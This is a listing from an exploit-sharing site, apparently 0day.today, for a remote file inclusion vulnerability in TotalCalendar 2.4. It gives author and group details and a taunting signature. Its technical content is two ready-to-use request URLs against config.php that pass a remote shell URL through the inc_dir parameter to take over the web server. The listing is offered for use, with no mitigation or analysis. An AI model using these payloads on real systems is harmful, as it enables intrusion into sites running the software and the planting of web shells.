[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

TotalCalendar 2.4 (inc_dir) Remote File Inclusion Vulnerability

Author
DarKdewiL
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5075
Category
web applications
Date add
19-04-2009
Platform
unsorted
===============================================================
TotalCalendar 2.4 (inc_dir) Remote File Inclusion Vulnerability
===============================================================


<--[+]-->
 
[~] Home Page : "http://www.simpoe.com/"
[~] Download : "http://www.simpoe.com/calendre/TotalCalendar_2.4.zip"
[~] ScriptName: "Simpoe Event Calendar"
[~] Date: "20/04/2009"
[~] Time: "18:38"

<--[!]-->

[+] Bugs : Remote File Include
[+] D0rk : Not Dork :(
[+] Author : DarKdewiL
[+] GroupWeb : www.1923turk.biz
[+] Contact : darkdewil@1923turk.biz

[!] Note : You're too important for anyone <1923Turk>
   
<--[-]-->

(+)Vuln:

http://www.sitename.com/calendre/config.php?inc_dir=ShellURL

OR

http://www.sitename.com/config.php?inc_dir=ShellURL




#  0day.today [2024-12-24]  #